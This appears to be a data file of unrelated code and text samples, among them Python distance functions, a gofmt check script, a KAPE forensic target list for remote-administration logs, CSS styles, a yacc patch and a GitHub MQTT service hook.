v)\n\n\ndef vector_length(u):\n return np.sqrt(u.dot(u))\n\n\ndef length_norm(u):\n return u / vector_length(u)\n\n\ndef cosine(u, v):\n return scipy.spatial.distance.cosine(u, v)\n\n\ndef matching(u, v):\n return np.sum(np.minimum(u, v))\n\n\ndef jaccard(u, v):\n return 1.0 - (matching(u, v) / np.sum(np.maximum(u, v)))\n\n\ndef neighbors(word, df, distfunc=cosine):\n \"\"\"\n Tool for finding the nearest neighbors of `word` in `df` according\n to `distfunc`. The comparisons are between row vectors.\n\n Parameters\n ----------\n word : str\n The anchor word. Assumed to be in `rownames`.\n\n df : pd.DataFrame\n The vector-space model.\n\n distfunc : function mapping vector pairs to floats (default: `cosine`)\n The measure of distance between vectors. Can also be `euclidean`,\n `matching`, `jaccard`, as well as any other distance measure\n between 1d vectors.\n\n Raises\n ------\n ValueError\n If word is not in `df.index`.\n\n Returns\n -------\n pd.Series\n Ordered by closeness to `word`.\n\n \"\"\"\n if word not in df.index:\n raise ValueError('{} is not in this VSM'.format(word))\n w = df.loc[word]\n dists = df.apply(lambda x: distfunc(w, x), axis=1)\n return dists.sort_values()" +"// --- INTERNAL USE ONLY ---\n\n/** @description\n * if a test contains an `external` propery as string\n * or as Array of strings, these will be injected in the page\n * before the test will be executed.\n * Handy specially with tests helpers able to deal with the DOM\n * in a simplified way than native API would offer (jQuery or such)\n */\n\n// holds all external libraries so these will be\n// downloaded only once\nvar JSContent = {};\n\n// ask the server to download the source of the library\n// throws if the returned status is not in range 200-399\nfunction downloadJSContent(src) {\n var xhr = XHR();\n xhr.open('GET', '/' + encodeURIComponent('<<<' + src), false);\n xhr.send(null);\n if (!/^(?:2|3)\\d{2}$/.test(xhr.status)) {\n throw new Error('unable to downlaod src');\n }\n return xhr.responseText;\n}\n\n// populate an array of urls with relative content per each url\nfunction grabJSContent(libraries) {\n for(var i = 0, src; i < libraries.length; i++) {\n src = libraries[i];\n libraries[i] = JSContent[src] || (\n JSContent[src] = downloadJSContent(src)\n );\n }\n return libraries;\n}" +"#!/bin/bash\n\nHAS_FMT_ERR=0\n# For every Go file in the project, excluding vendor...\nfor file in $(go list -f '{{$dir := .Dir}}{{range .GoFiles}}{{printf \"%s/%s\\n\" $dir .}}{{end}}' ./...); do\n # ... if file does not contain standard generated code comment (https://golang.org/s/generatedcode)...\n if ! grep -Exq '^// Code generated .* DO NOT EDIT\\.$' $file; then\n FMT_OUT=\"$(gofmt -l -d -e $file)\" # gofmt exits 0 regardless of whether it's formatted.\n # ... and if gofmt had any output...\n if [[ -n \"$FMT_OUT\" ]]; then\n if [ \"$HAS_FMT_ERR\" -eq \"0\" ]; then\n # Only print this once.\n HAS_FMT_ERR=1\n echo 'Commit includes files that are not gofmt-ed' && \\\n echo 'run \"make fmt\"' && \\\n echo ''\n fi\n echo \"$FMT_OUT\" # Print output and continue, so developers don't fix one file at a t\n fi\n fi\ndone\n\n## print at the end too... sometimes it is nice to see what to do at the end.\nif [ \"$HAS_FMT_ERR\" -eq \"1\" ]; then\n echo 'Commit includes files that are not gofmt-ed' && \\\n echo 'run \"make fmt\"' && \\\n echo ''\nfi\n\ncd libflux\nFMT_OUT=\"$(cargo fmt --all -- --check)\"\nif [[ -n \"$FMT_OUT\" ]]; then\n echo 'Commit includes files that are not rustfmt-ed' && \\\n echo 'run" +"close all; clc; clear;\r\n\r\naddpath(genpath('./.'));\r\nfolder = './.'; % Put the image pairs in this folder\r\nfilepaths = dir(fullfile(folder, '*.png'));\r\n\r\nfor i = 1:2:size(filepaths)\r\n I1 = im2double(imread(fullfile(folder,filepaths(i).name))); % reference image\r\n I2 = im2double(imread(fullfile(folder,filepaths(i+1).name))); % target image\r\n\r\n s = 2; % s = len1/len2, len1&lend2 are the focal length of captured image (len1>len2)\r\n r = 1 - 1/s; % Scale\r\n I2_zoom = warpImg(I2,[-r,0,0,0]);\r\n \r\n tau0 = zeros(6,1);\r\n iter = 3; % number of iterations\r\n\r\n [I2_t,tau] = align_l(I2_zoom,I1,tau0,iter);\r\n [I2_t_l] = luminance_transfer(I1,I2_t); % transfer luminance\r\n [I2_t_c] = color_transfer(I1,I2_t); % transfer color\r\n\r\n % where you save the image\r\n imwrite(I1, ['./.', filepaths(i).name]) \r\n imwrite(I2_t_c, ['./.', filepaths(i+1).name])\r\nend" +"Description: Composite target for files related to remote administration tools\nAuthor: Drew Ervin, Mathias Frank\nVersion: 1.3\nId: 31cf5a4e-c44c-4457-b11f-74dca73e141b\nRecreateDirectories: true\nTargets:\n -\n Name: RDP Logs\n Category: EventLogs\n Path: RDPLogs.tkape\n Comment: \"Contains Windows Event Logs related to RDP\"\n -\n Name: RDP Cache\n Category: ApplicationData\n Path: RDPCache.tkape\n Comment: \"Contains data cached during recent RDP sessions\"\n -\n Name: LogMeIn\n Category: ApplicationLogs\n Path: LogMeIn.tkape\n -\n Name: VNC\n Category: ApplicationLogs \n Path: VNCLogs.tkape\n -\n Name: Chrome Remote Desktop\n Category: ApplicationLogs\n Path: ApplicationEvents.tkape\n -\n Name: TeamViewer\n Category: ApplicationLogs\n Path: TeamViewerLogs.tkape\n -\n Name: Ammyy\n Category: Ammyy.tkape\n Path: ApplicationLogs\n -\n Name: Kaseya\n Category: ApplicationLogs\n Path: Kaseya.tkape\n -\n Name: ScreenConnect (ConnectWise Control)\n Category: ApplicationLogs\n Path: ScreenConnect.tkape\n -\n Name: Radmin\n Category: ApplicationLogs\n Path: Radmin.tkape\n Comment: \"Radmin Server and Viewer Logs and Chats\"" +"+++\ntitle = \"Reports talk:Tasks not implemented in FreeBASIC\"\ndescription = \"\"\ndate = 2016-10-04T22:49:35Z\naliases = []\n[extra]\nid = 21145\n[taxonomies]\ncategories = []\ntags = []\n+++\n\nThis list seems to be rather old (last edited in August 2014). Who can update it? Or will it be updated automatically? --[[User:Lothar Schirm|Lothar Schirm]], 04 October 2016\n\nThe lists update automatic when there is a change.\nBut you must use the correct way to write FreeBASIC in the header tag is FreeBASIC, if it's not correct it will be in red in the list, meaning there is no page for that name. If it's correct it will be in blue and the link to the FreeBASIC page will work. If correct all the list's will be updated (most of the time whitin a minute). The lang tag is not case sensitive, I write it as freebasic (lowercase).--[[User:Frisian|Frisian]] ([[User talk:Frisian|talk]]) 22:49, 4 October 2016 (UTC)" +"\n.date-icon {\n margin-left: 12;\n vertical-align: center;\n}\n\n.date-text {\n margin-left: 10;\n color: #FFD5CA;\n font-family: \"Helvetica-Light\";\n vertical-align: center;\n font-size: 18;\n}\n\n.arrow-right {\n margin-right: 18;\n horizontal-align: right;\n vertical-align: center;\n}\n\n.title-container {\n background-image: url(\"res://dataform_wood_pattern\");\n background-repeat: no-repeat;\n background-position: center;\n background-size: cover;\n padding-left: 12;\n padding-right: 12;\n padding-top: 12;\n}\n\n.title-view-item {\n font-size: 27;\n font-family: \"Helvetica-Light\";\n color: white; \n}\n\n.subtitle-view-item {\n color: #C4C4C4;\n font-weight: bold;\n font-family: \"Helvetica-Light\";\n font-size: 14;\n}\n\n.button-add {\n margin-top: 16;\n margin-right: 12;\n vertical-align: top;\n horizontal-align:right;\n}\n\n.reservation_info_time_container {\n margin: 12;\n width: 44;\n height: 44;\n}\n\n.reservation_info_time_inner_container {\n vertical-align: center;\n}\n\n.reservation_info_time {\n font-size: 14;\n font-family: \"Helvetica-Light\";\n color: white;\n text-align: left;\n margin-left: 6;\n}\n\n.reservation_info_time_ampm {\n font-size: 13;\n font-family: \"Helvetica-Light\";\n color: white;\n text-align: left;\n font-weight: bold;\n margin-top: -2;\n margin-left: 6;\n}\n\n.reservation_info_container {\n vertical-align: center;\n}\n\n.reservation_info_name {\n font-size: 16;\n color: black;\n}\n\n.reservation_info_details {\n font-size: 14;\n font-weight: bold;\n color: #BF3136;\n}\n\n.reservation_info_phone {\n padding-right: 16;\n font-size: 13;\n text-decoration: underline;\n color: #8F8C8B;\n vertical-align: center;\n}" +"201\n0.0025 0 \n0 0 \n0.005 0 \n0.0075 0 \n0.01 0 \n0.0125 0 \n0.015 0 \n0.0175 0 \n0.02 0 \n0.0225 0 \n0.025 0 \n0.0275 0 \n0.03 0 \n0.0325 0 \n0.035 0 \n0.0375 0 \n0.04 0 \n0.0425 0 \n0.045 0 \n0.0475 0 \n0.05 0 \n0.0525 0 \n0.055 0 \n0.0575 0 \n0.06 0 \n0.0625 0 \n0.065 0 \n0.0675 0 \n0.07 0 \n0.0725 0 \n0.075 0 \n0.0775 0 \n0.08 0 \n0.0825 0 \n0.085 0 \n0.0875 0 \n0.09 0 \n0.0925 0 \n0.095 0 \n0.0975 0 \n0.1 0 \n0.1025 0 \n0.105 0 \n0.1075 0 \n0.11 0 \n0.1125 0 \n0.115 0 \n0.1175 0 \n0.12 0 \n0.1225 0 \n0.125 0 \n0.1275 0 \n0.13 0 \n0.1325 0 \n0.135 0 \n0.1375 0 \n0.14 0 \n0.1425 0 \n0.145 0 \n0.1475 0 \n0.15 0 \n0.1525 0 \n0.155 0 \n0.1575 0 \n0.16 0 \n0.1625 0 \n0.165 0 \n0.1675 0 \n0.17 0 \n0.1725 0 \n0.175 0 \n0.1775 0 \n0.18 0 \n0.1825 0 \n0.185 0 \n0.1875 0 \n0.19 0 \n0.1925 0 \n0.195 0 \n0.1975 0 \n0.2 0 \n0.2025 0 \n0.205 0 \n0.2075 0 \n0.21 0 \n0.2125 0 \n0.215 0 \n0.2175 0 \n0.22 0 \n0.2225 0 \n0.225 0 \n0.2275 0 \n0.23 0 \n0.2325 0 \n0.235 0 \n0.2375 0 \n0.24 0 \n0.2425 0 \n0.245 0 \n0.2475" +"#\n# Obsolete! New projects should use .azure/templates/jobs/default-build.yml instead\n#\n# TODO: remove this once templated projects have referenced the new location.\n#\n# default-build.yml\n# Description: Defines a build phase for invoking build.sh/cmd\n# Parameters:\n# phaseName: string\n# The name of the phase. Defaults to the name of the OS.\n# queueName: string\n# The name of the VSTS agent queue to use.\n# agentOs: string\n# Used in templates to define variables which are OS specific. Typically from the set { Windows, Linux, macOS }\n# buildArgs: string\n# Additional arguments to pass to the build.sh/cmd script.\n# Note: -ci is always passed\n# beforeBuild: [steps]\n# Additional steps to run before build.sh/cmd\n# afterBuild: [steps]\n# Additional steps to run after build.sh/cmd\n# artifacts:\n# publish: boolean\n# Should artifacts be published\n# path: string\n# The file path to artifacts output\n# name: string\n# The name of the artifact container\n# variables: { string: string }\n# A map of custom variables\n# matrix: { string: { string: string } }\n# A map of matrix configurations and variables. https://docs.microsoft.com/en-us/vsts/pipelines/yaml-schema?view=vsts#matrix\n# demands: string | [ string ]\n# A list of agent demands. https://docs.microsoft.com/en-us/vsts/pipelines/yaml-schema?view=vsts#demands" +"Teclas de Atalhos Gen\u00e9ricas\n===========================\n\nAlgumas das teclas de atalhos se aplicam a qualquer painel que esteja\nselecionado. Elas s\u00e3o chamadas teclas de atalhos gen\u00e9ricas.\n\nAqui est\u00e1 a lista de todas as teclas de atalhos gen\u00e9ricas, junto com\nsuas respectivas a\u00e7\u00f5es:\n\n '^R' : Redesenhar -> redesenha pain\u00e9is do calcurse, sendo \u00fatil se\n voc\u00ea redimensionar a sua tela de terminal ou\n quando aparece lixo na vis\u00e3o do calcurse\n '^A' : AdicAgend -> adiciona um agendamento ou um evento\n '^T' : AdiTarefa -> adiciona uma tarefa\n 'T' : -1 Dia -> move para dia anterior\n 't' : +1 Dia -> move para dia seguinte\n 'W' : -1 Semana -> move para semana anterior\n 'w' : +1 Semana -> move para semana seguinte\n 'M' : -1 M\u00eas -> move para m\u00eas anterior\n 'm' : +1 M\u00eas -> move para m\u00eas seguinte\n 'Y' : -1 Ano -> move para ano anterior\n 'y' : +1 Ano -> move para ano seguinte\n '^G' : IrPara hoje -> move para o dia de hoje\n\nAs teclas '^P' e '^N' s\u00e3o usadas para rolar texto para cima e para\nbaixo quando se est\u00e1 dentro de telas espec\u00edficas, como, por exemplo,\nas telas de ajuda. Elas tamb\u00e9m s\u00e3o usadas" +"# frozen_string_literal: true\n\n# Class builder helps creating anonymous classes that we can use to spec our code\n# We need co create new class instances to have an \"empty\" and \"clear\" class for each spec\n# This module acts as an interface to create classes\nmodule ClassBuilder\n class << self\n # Creates an empty class without any predefined methods\n # @param block [Proc, nil] block that should be evaluated (if given)\n # @return [Class] created anonymous class\n def build(&block)\n klass = Class.new\n\n klass.class_eval(&block) if block_given?\n klass\n end\n\n # This method allows us to create a class that inherits from any other\n # @param klass [Class] any class from which we want to inherit in our anonymous class\n # @param block [Proc] a block of code that should be evaluated in a new anonymous class body\n # @return [Class] new anonymous class\n def inherit(klass, &block)\n Class.new(klass, &block)\n end\n end\nend" +"--- rec_parse.y.orig\t2001-12-10 17:01:17 UTC\n+++ rec_parse.y\n@@ -32,9 +32,8 @@\n #include \"dmalloc.h\"\n #endif\n \n-static int yyerror(char *err);\n+static int yyerror(rec_t *rec, char *err);\n \n-#define YYPARSE_PARAM rec\n #define YYERROR_VERBOSE\n \n #ifdef REC_PARSE_DEBUG\n@@ -47,6 +46,7 @@ static feature_list_t FEATURE_ERROR = { \n %}\n \n %pure_parser\n+%parse-param { rec_t *rec }\n \n %union {\n int ival;\n@@ -141,7 +141,7 @@ mode_decl\t: MODE STRING\n \t\t| MODE STRING \n \t\t\t{\n \t\t\t /* Do this first so the default mode gets set correctly*/\n-\t\t\t $$ = rec_get_mode((rec_t *) rec, $2);\n+\t\t\t $<rec_mode>$ = rec_get_mode((rec_t *) rec, $2);\n \t\t\t}\n \t\t ':' mode_id_list\n \t\t\t{\n@@ -162,12 +162,14 @@ mode_id_list\t: mode_id\n \t\t\t $$ = $1;\n \t\t\t rec_mode_list_append(&$$, $3);\n \t\t\t}\n+\t\t\t;\n \n mode_id\t\t: STRING\n \t\t\t{\n \t\t\t $$ = rec_get_mode((rec_t *) rec, $1);\n \t\t\t free($1);\n \t\t\t}\n+\t\t\t;\n \n gesture_list\t: gesture\n \t\t\t{\n@@ -342,7 +344,7 @@ option\t\t: OPTION STRING STRING\n \t\t\t\n %%\n \n-static int yyerror(char *err)\n+static int yyerror(rec_t *rec, char *err)\n {\n char *loc = rec_lex_location_alloc();\n fprintf(stderr, \"%s: %s\\n\", loc, err);" +"import { Point } from \"../point.class\";\nimport { LineHelper } from \"./linehelper.class\";\n\ndescribe(\"LineHelper\", () => {\n it(\"should return a diagonal line from (0,0) to (10,10)\", () => {\n const SUT = new LineHelper();\n\n const from = new Point(0, 0);\n const to = new Point(10, 10);\n\n const expected: Point[] = [];\n for (let idx = 0; idx <= to.x; ++idx) {\n expected.push(new Point(idx, idx));\n }\n const result = SUT.straightLine(from, to);\n expect(result.length).toBe(expected.length);\n for (let idx = 0; idx < result.length; ++idx) {\n expect(result[idx]).toEqual(expected[idx]);\n }\n });\n\n it(\"should return a diagonal line from (10,10) to (0,0)\", () => {\n const SUT = new LineHelper();\n\n const from = new Point(10, 10);\n const to = new Point(0, 0);\n\n const expected: Point[] = [];\n for (let idx = 10; idx >= to.x; --idx) {\n expected.push(new Point(idx, idx));\n }\n const result = SUT.straightLine(from, to);\n expect(result.length).toBe(expected.length);\n for (let idx = 0; idx < result.length; ++idx) {\n expect(result[idx]).toEqual(expected[idx]);\n }\n });\n});" +"class Service::MqttPub < Service\n self.title = 'MQTT publish'\n\n string :broker, :port, :topic, :clientid, :user\n password :pass\n boolean :retain\n\n require 'mqtt'\n\n def receive_push\n\n # Optional - use m2m.io public broker if not specified\n broker = data['broker'].to_s\n if broker == ''\n broker = 'q.m2m.io'\n end\n\n # Optional - use standard MQTT port if not specified\n port = data['port'].to_i\n if data['port'].to_s == ''\n port = 1883\n end\n\n if data['topic'].to_s == ''\n raise_config_error \"Invalid topic. Try github/<github_username>/<repo_name> .\"\n end\n\n # Optional - generate random epoch for ID if not specified\n clientid = data['clientid'].to_s\n if clientid == ''\n # Random ID doesn't make sense, but use prefix like MQTT::generate_client_id\n clientid = 'github_' + Time.now.to_i.to_s\n end\n\n # Optional, specify nil if not specified (per http://rubydoc.info/gems/mqtt/MQTT/Client)\n user = data['user'].to_s\n if user == ''\n user = nil\n end\n\n # Optional, specify nil if not specified\n pass = data['pass'].to_s\n if pass == ''\n pass = nil\n end\n\n # Handle specifying a username or a password, but not both\n if user != nil and pass == nil\n raise_config_error \"You specified a username without a password.\"\n end\n\n if pass != nil and user == nil\n raise_config_error \"You specified a password without a username.\"\n end\n\n begin\n # Connect to the broker, publish" +"# Edge Telemetry processor\n\n[Home](readme.md)\n\n## Overview\n\nThe telemetry processor processes all edge telemetry in that it\n\n* Filters out edge events and discards them (processed by the [Edge Event processor](events.md)).\n* Decodes binary PubSub (UADP) network messages\n* Converts PubSub Network messages into simple messages\n* Forwards these and other telemetry to a secondary Event Hub to [forward to applications](ux.md), process through TSI and/or store in [Datalake](cdm.md).\n\nThe edge telemetry processor is an event processor host and can be scaled out to handle the configured number of partitions. It connects to the \"telemetry\" consumer group on IoT Hub.\n\n## Docker image\n\n`docker pull mcr.microsoft.com/iot/industrial-iot-telemetry-processor:preview`" +"import { Suite } from 'benchmark'\nimport objectAssignDeep from 'object-assign-deep'\nimport mergeDeep from 'merge-deep'\nimport { default as deepExtendNpm } from 'deep-extend'\nimport { deepExtend } from '../src/utils/deep-extend'\n\nconst suite = new Suite()\n\nsuite\n .add('object-assign-deep', () => {\n const obj = {\n createUser: {\n select: {\n a: true,\n b: true,\n c: true,\n },\n },\n }\n\n const select = {\n createUser: {\n select: {\n a: false,\n b: true,\n d: {\n e: true,\n },\n },\n },\n }\n objectAssignDeep(obj, select)\n })\n .add('merge-deep', () => {\n const obj = {\n createUser: {\n select: {\n a: true,\n b: true,\n c: true,\n },\n },\n }\n\n const select = {\n createUser: {\n select: {\n a: false,\n b: true,\n d: {\n e: true,\n },\n },\n },\n }\n mergeDeep(obj, select)\n })\n .add('deep-extend', () => {\n const obj = {\n createUser: {\n select: {\n a: true,\n b: true,\n c: true,\n },\n },\n }\n\n const select = {\n createUser: {\n select: {\n a: false,\n b: true,\n d: {\n e: true,\n },\n },\n },\n }\n deepExtendNpm(obj, select)\n })\n .add('deep-extend-es2017', () => {\n const obj = {\n createUser: {\n select: {\n a: true,\n b: true,\n c: true,\n },\n },\n }\n\n const select = {\n createUser: {\n select: {\n a: false,\n b: true,\n d:" +"var _ = require('lodash');\n\nmodule.exports = function traverse(node) {\n if (node.type === 'Sequence') {\n var args = node.arguments.map(traverse);\n for (var i = 0; i < args.length; i += 1) {\n var n = args[i];\n if (n.type === 'ZeroOrMore' && n.arguments.length === 1 && n.arguments[0].type === 'Sequence') {\n var innerSeq = n.arguments[0].arguments.slice();\n var outerSeq = args.slice(0, i);\n var common = [];\n while (innerSeq.length && outerSeq.length) {\n if (_.isEqual(innerSeq[innerSeq.length-1], outerSeq[outerSeq.length-1])) {\n common.unshift(innerSeq.pop());\n outerSeq.pop();\n } else {\n break;\n }\n }\n if (common.length) {\n args = outerSeq.concat([{\n type: 'OneOrMore',\n arguments: [{\n type: 'Sequence',\n arguments: common\n }, {\n type: 'Sequence',\n arguments: innerSeq.reverse()\n }]\n }], args.slice(i+1));\n }\n }\n }\n\n return {\n type: node.type,\n arguments: args\n };\n }\n\n if (node.arguments && node.arguments.length) {\n return {\n type: node.type,\n arguments: node.arguments.map(traverse)\n }\n }\n return node;\n}" +"package org.petitparser.parser.repeating;\n\nimport org.petitparser.parser.Parser;\nimport org.petitparser.parser.combinators.DelegateParser;\n\nimport java.util.Objects;\n\n/**\n * An abstract parser that repeatedly parses between 'min' and 'max' instances\n * of its delegate.\n */\npublic abstract class RepeatingParser extends DelegateParser {\n\n public static final int UNBOUNDED = -1;\n\n protected final int min;\n protected final int max;\n\n public RepeatingParser(Parser delegate, int min, int max) {\n super(delegate);\n this.min = min;\n this.max = max;\n if (min < 0) {\n throw new IllegalArgumentException(\n \"Invalid min repetitions: \" + getRange());\n }\n if (max != UNBOUNDED && min > max) {\n throw new IllegalArgumentException(\n \"Invalid max repetitions: \" + getRange());\n }\n }\n\n @Override\n public boolean hasEqualProperties(Parser other) {\n return super.hasEqualProperties(other) &&\n Objects.equals(min, ((RepeatingParser) other).min) &&\n Objects.equals(max, ((RepeatingParser) other).max);\n }\n\n @Override\n public String toString() {\n return super.toString() + \"[\" + getRange() + \"]\";\n }\n\n private String getRange() {\n return min + \"..\" + (max == UNBOUNDED ? \"*\" : max);\n }\n}" +"// Copyright (c) Microsoft. All rights reserved.\nnamespace Microsoft.Azure.Devices.Routing.Core.Endpoints.StateMachine\n{\n using System;\n using System.Globalization;\n\n /// <summary>\n /// Stores current state and command to be used as a key\n /// in the state transition table.\n /// </summary>\n public struct StateCommandPair : IEquatable<StateCommandPair>\n {\n readonly State state;\n readonly CommandType command;\n\n public StateCommandPair(State state, CommandType command)\n {\n this.state = state;\n this.command = command;\n }\n\n public static bool operator ==(StateCommandPair pair1, StateCommandPair pair2)\n {\n return pair1.Equals(pair2);\n }\n\n public static bool operator !=(StateCommandPair pair1, StateCommandPair pair2)\n {\n return !pair1.Equals(pair2);\n }\n\n public bool Equals(StateCommandPair other)\n {\n return this.state == other.state && this.command == other.command;\n }\n\n public override bool Equals(object obj)\n {\n return obj is StateCommandPair && this.Equals((StateCommandPair)obj);\n }\n\n public override int GetHashCode()\n {\n unchecked\n {\n return ((int)this.state * 397) ^ (int)this.command;\n }\n }\n\n public override string ToString() =>\n string.Format(CultureInfo.InvariantCulture, \"StateCommandPair({0}, {1})\", this.state, this.command);\n }\n}" +".\\\" Copyright (c) 2002\\-2006 Szabolcs Szakacsits.\n.\\\" Copyright (c) 2005 Richard Russon.\n.\\\" Copyright (c) 2011\\-2013 Jean-Pierre Andre.\n.\\\" This file may be copied under the terms of the GNU Public License.\n.\\\"\n.TH NTFSRESIZE 8 \"July 2013\" \"ntfs-3g @VERSION@\"\n.SH NAME\nntfsresize \\- resize an NTFS filesystem without data loss\n.SH SYNOPSIS\n.B ntfsresize\n[\\fIOPTIONS\\fR]\n.B \\-\\-info(\\-mb\\-only)\n.I DEVICE\n.br\n.B ntfsresize\n[\\fIOPTIONS\\fR]\n[\\fB\\-\\-size \\fISIZE\\fR[\\fBk\\fR|\\fBM\\fR|\\fBG\\fR]]\n.I DEVICE\n.SH DESCRIPTION\nThe\n.B ntfsresize\nprogram safely resizes Windows XP, Windows Server 2003, Windows 2000, Windows\nNT4 and Longhorn NTFS filesystems without data loss. All NTFS versions are\nsupported, used by 32\\-bit and 64\\-bit Windows.\n.B Defragmentation is NOT required prior to resizing\nbecause the program can relocate any data if needed, without risking data\nintegrity.\n.PP\nNtfsresize can be used to shrink or enlarge any NTFS filesystem located\non an unmounted\n.I DEVICE\n(usually a disk partition). The new filesystem will fit in a DEVICE\nwhose desired size is\n.I SIZE\nbytes.\nThe\n.I SIZE\nparameter may have one of the optional modifiers\n.BR k ,\n.BR M ,\n.BR G ,\nwhich means the\n.I SIZE\nparameter is given in kilo\\-, mega\\- or gigabytes respectively.\n.B Ntfsresize\nconforms to the" +"// AttributeTypeCode.cs\n//\n\nusing System;\nusing System.Collections.Generic;\nusing System.Runtime.CompilerServices;\n\nnamespace Xrm.Sdk.Metadata\n{\n // Summary:\n // Describes the type of an attribute.\n //[DataContract(Name = \"AttributeTypeCode\", Namespace = \"http://schemas.microsoft.com/xrm/2011/Metadata\")]\n [NamedValues]\n [ScriptNamespace(\"SparkleXrm.Sdk.Metadata\")]\n public enum AttributeTypeCode\n {\n // Summary:\n // A Boolean attribute. Value = 0.\n [ScriptName(\"Boolean\")]\n Boolean_ = 0,\n //\n // Summary:\n // An attribute that represents a customer. Value = 1.\n [ScriptName(\"Customer\")]\n Customer = 1,\n //\n // Summary:\n // A date/time attribute. Value = 2.\n [ScriptName(\"DateTime\")]\n DateTime = 2,\n //\n // Summary:\n // A decimal attribute. Value = 3.\n [ScriptName(\"Decimal\")]\n Decimal = 3,\n //\n // Summary:\n // A double attribute. Value = 4.\n [ScriptName(\"Double\")]\n Double_ = 4,\n //\n // Summary:\n // An integer attribute. Value = 5.\n [ScriptName(\"Integer\")]\n Integer = 5,\n //\n // Summary:\n // A lookup attribute. Value = 6.\n [ScriptName(\"Lookup\")]\n Lookup = 6,\n //\n // Summary:\n // A memo attribute. Value = 7.\n [ScriptName(\"Memo\")]\n Memo = 7,\n //\n // Summary:\n // A money attribute. Value = 8.\n [ScriptName(\"None\")]\n Money = 8,\n //\n // Summary:\n // An owner attribute. Value = 9.\n [ScriptName(\"Owner\")]\n Owner = 9,\n //\n // Summary:\n // A partylist attribute. Value = 10.\n [ScriptName(\"PartyList\")]\n PartyList = 10,\n //\n // Summary:\n // A picklist attribute. Value = 11.\n [ScriptName(\"Picklist\")]" +"from artiq.language.core import *\nfrom artiq.language.types import *\n\n\n@syscall(flags={\"nounwind\", \"nowrite\"})\ndef cache_get(key: TStr) -> TList(TInt32):\n raise NotImplementedError(\"syscall not simulated\")\n\n@syscall(flags={\"nowrite\"})\ndef cache_put(key: TStr, value: TList(TInt32)) -> TNone:\n raise NotImplementedError(\"syscall not simulated\")\n\n\nclass CoreCache:\n \"\"\"Core device cache access\"\"\"\n def __init__(self, dmgr, core_device=\"core\"):\n self.core = dmgr.get(core_device)\n\n @kernel\n def get(self, key):\n \"\"\"Extract a value from the core device cache.\n After a value is extracted, it cannot be replaced with another value using\n :meth:`put` until all kernel functions finish executing; attempting\n to replace it will result in a :class:`artiq.coredevice.exceptions.CacheError`.\n\n If the cache does not contain any value associated with ``key``, an empty list\n is returned.\n\n The value is not copied, so mutating it will change what's stored in the cache.\n\n :param str key: cache key\n :return: a list of 32-bit integers\n \"\"\"\n return cache_get(key)\n\n @kernel\n def put(self, key, value):\n \"\"\"Put a value into the core device cache. The value will persist until reboot.\n\n To remove a value from the cache, call :meth:`put` with an empty list.\n\n :param str key: cache key\n :param list value: a list of 32-bit integers\n \"\"\"\n cache_put(key, value)" +"class UWindowConsoleWindow extends UWindowFramedWindow;\n\nvar float OldParentWidth, OldParentHeight;\n\nfunction Created() \n{\n\tSuper.Created();\n\tbSizable = True;\n\tbStatusBar = True;\n\tbLeaveOnScreen = True;\n\n\tOldParentWidth = ParentWindow.WinWidth;\n\tOldParentHeight = ParentWindow.WinHeight;\n\n\tSetDimensions();\n\n\tSetAcceptsFocus();\n}\n\nfunction ShowWindow()\n{\n\tSuper.ShowWindow();\n\n\tif(ParentWindow.WinWidth != OldParentWidth || ParentWindow.WinHeight != OldParentHeight)\n\t{\n\t\tSetDimensions();\n\t\tOldParentWidth = ParentWindow.WinWidth;\n\t\tOldParentHeight = ParentWindow.WinHeight;\n\t}\n}\n\nfunction ResolutionChanged(float W, float H)\n{\n\tSetDimensions();\n}\n\nfunction SetDimensions()\n{\n\tif (ParentWindow.WinWidth < 500)\n\t{\n\t\tSetSize(200, 150);\n\t} else {\n\t\tSetSize(410, 310);\n\t}\n\tWinLeft = ParentWindow.WinWidth/2 - WinWidth/2;\n\tWinTop = ParentWindow.WinHeight/2 - WinHeight/2;\n}\n\nfunction Close(optional bool bByParent)\n{\n\tClientArea.Close(True);\n\tRoot.GotoState('');\n}\n\t\ndefaultproperties\n{\n\tWindowTitle=\"Game Console\";\n\tClientClass=class'UWindowConsoleClientWindow'\n}" +"import { elementFinderProperty, IconifyElement } from './element';\nimport { ObservedNode } from './observed-node';\nimport {\n\tlistRootNodes,\n\taddRootNode,\n\tfindRootNode,\n\tremoveRootNode,\n} from './root';\nimport { onReady } from './ready';\n\n/**\n * Observer callback function\n */\nexport type ObserverCallback = (item: ObservedNode) => void;\n\n/**\n * Callback\n */\nlet callback: ObserverCallback | null = null;\n\n/**\n * Parameters for mutation observer\n */\nconst observerParams: MutationObserverInit = {\n\tchildList: true,\n\tsubtree: true,\n\tattributes: true,\n};\n\n/**\n * Queue DOM scan\n */\nfunction queueScan(node: ObservedNode): void {\n\tif (!node.observer) {\n\t\treturn;\n\t}\n\n\tconst observer = node.observer;\n\tif (!observer.pendingScan) {\n\t\tobserver.pendingScan = setTimeout(() => {\n\t\t\tdelete observer.pendingScan;\n\t\t\tif (callback) {\n\t\t\t\tcallback(node);\n\t\t\t}\n\t\t});\n\t}\n}\n\n/**\n * Check mutations for added nodes\n */\nfunction checkMutations(node: ObservedNode, mutations: MutationRecord[]): void {\n\tif (!node.observer) {\n\t\treturn;\n\t}\n\n\tconst observer = node.observer;\n\tif (!observer.pendingScan) {\n\t\tfor (let i = 0; i < mutations.length; i++) {\n\t\t\tconst item = mutations[i];\n\t\t\tif (\n\t\t\t\t// Check for added nodes\n\t\t\t\t(item.addedNodes && item.addedNodes.length > 0) ||\n\t\t\t\t// Check for icon or placeholder with modified attributes\n\t\t\t\t(item.type === 'attributes' &&\n\t\t\t\t\t(item.target as IconifyElement)[elementFinderProperty] !==\n\t\t\t\t\t\tvoid 0)\n\t\t\t) {\n\t\t\t\tif (!observer.paused) {\n\t\t\t\t\tqueueScan(node);\n\t\t\t\t}\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\t}\n}\n\n/**\n * Start/resume observer\n */" +"#' Tools for Models Available in \\code{train}\n#'\n#' These function show information about models and packages that are\n#' accessible via \\code{\\link{train}}\n#'\n#' \\code{modelLookup} is good for getting information related to the tuning\n#' parameters for a model. \\code{getModelInfo} will return all the functions\n#' and metadata associated with a model. Both of these functions will only\n#' search within the models bundled in this package.\n#'\n#' \\code{checkInstall} will check to see if packages are installed. If they are\n#' not and the session is interactive, an option is given to install the\n#' packages using \\code{\\link[utils]{install.packages}} using that functions\n#' default arguments (the missing packages are listed if you would like to\n#' install them with other options). If the session is not interactive, an\n#' error is thrown.\n#'\n#' @aliases modelLookup getModelInfo checkInstall\n#' @param model a character string associated with the \\code{method} argument\n#' of \\code{\\link{train}}. If no value is passed, all models are returned. For\n#' 